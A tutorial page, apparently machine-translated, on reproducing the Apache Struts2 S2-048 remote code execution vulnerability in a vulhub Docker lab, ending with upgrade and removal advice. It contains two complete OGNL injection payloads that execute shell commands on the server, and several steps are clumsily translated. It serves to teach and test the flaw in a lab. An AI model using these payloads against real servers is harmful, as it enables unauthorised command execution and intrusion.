Home >Operation and Maintenance >Safety >How to reproduce the Apache Struts2--048 remote code execution vulnerability
The Struts2 framework is an open source web application architecture for developing Java EE web applications . It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.
The Apache Struts2 2.3.x series has the struts2-struts1-plugin plug-in enabled and the struts2-showcase directory exists. The cause of the vulnerability is when ActionMessage receives the client When controlling parameter data, improper processing after subsequent data splicing and transmission leads to arbitrary code execution
Struts2 is enabled in the Apache Struts 2.3.x series -struts1-plugin plug-in version.
1. It is more complicated to build Apache Struts2 by yourself. This vulnerability environment is built using the docker environment in vulhub.
Download address: https://github.com/vulhub/vulhub
2. After downloading, unzip and enter the s2-048 directory, and start the vulnerability environment
cd cd vulhub -master/struts2/s2-048/ //Enter the directory
##docker-compose up -d //Start the shooting range3. Use docker ps to check whether the startup is successful 4. Enter http:your-ip:8080/hello.action in the browser and see the following page environment Construction completed
##2. Put ${1+1 at "Gangster Name" }Modify the payload statement executed by the following command
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@ getRuntime().exec('id').getInputStream())).(#q)}
3. You can also Use Burp to capture the packet and modify it into the statement of the payload executed by the command
Note: The payload needs to be URL encoded
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?( #_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id') .(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe', '/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream( true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io. IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
4. It can be implemented using automated scripts or graphical tools, and is not demonstrated here.
Tools can be searched and downloaded on GitHub
1. Upgrade It is recommended to upgrade to the latest version
2. According to business conditions, disable and close (delete) \struts-2.3.x\apps\struts2-showcase.war package
The above is the detailed content of How to reproduce the Apache Struts2--048 remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!